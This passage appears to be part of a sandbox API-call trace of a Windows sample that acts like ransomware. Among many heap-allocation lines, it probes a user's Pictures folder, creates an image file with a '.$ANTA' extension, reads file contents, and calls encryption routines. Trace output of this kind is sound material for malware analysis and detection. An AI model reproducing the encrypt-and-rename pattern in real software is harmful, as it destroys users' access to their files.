lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0090.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0090.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.883] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0090.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0090.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0090.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0090.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0090.884] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0090.884] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0090.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0090.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0090.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0090.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0090.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0090.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0090.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0090.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0090.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0090.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0090.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0090.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0090.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0090.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0090.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0090.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0090.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0090.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0090.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0090.886] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0090.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0090.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0090.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0090.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0090.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0090.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0090.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0090.887] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\XwG8Sj1nv9U.bmp.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\xwg8sj1nv9u.bmp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0090.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0090.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0090.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0090.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0090.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0090.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0090.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0090.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.888] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0090.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0090.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0090.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0090.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0090.888] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0090.888] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0090.888] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0090.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0090.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0090.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0090.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0090.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0090.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0090.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0090.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0090.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0090.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0090.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0b020 [0090.892] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0090.892] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0090.896] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x1095, lpOverlapped=0x0) returned 1 [0090.896] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0090.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0090.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0090.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0090.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11095) returned 0x4516010 [0090.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0090.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0090.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0090.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0090.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11095) returned 0x45270b0 [0090.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0090.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.903] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 1 [0090.903] TranslateMessage (lpMsg=0x144f2dc) returned 0 [0090.903] DispatchMessageW (lpMsg=0x144f2dc) returned 0x0 [0090.903] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0090.903] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0090.904] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0090.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0090.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0090.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0090.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0090.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11095) returned 0x4516010 [0090.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0090.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0090.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0090.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.904] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0090.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0090.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0090.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0090.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0090.904] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0090.905] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0090.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0090.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11095) returned 0x4516010 [0090.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2330 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0090.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0090.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0090.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2380 [0090.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0090.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0090.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0090.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0090.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0090.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0090.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0090.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0090.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0090.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11095) returned 0x4538150 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0090.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0090.908] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0090.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0090.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0090.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0090.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0090.909] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0090.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0090.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0090.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0090.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0090.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0090.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0090.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0090.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0090.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0090.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0090.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0090.909] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0090.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0090.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0090.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0090.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0090.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0090.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0090.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0090.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca460 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0090.913] RtlAllocateHeap 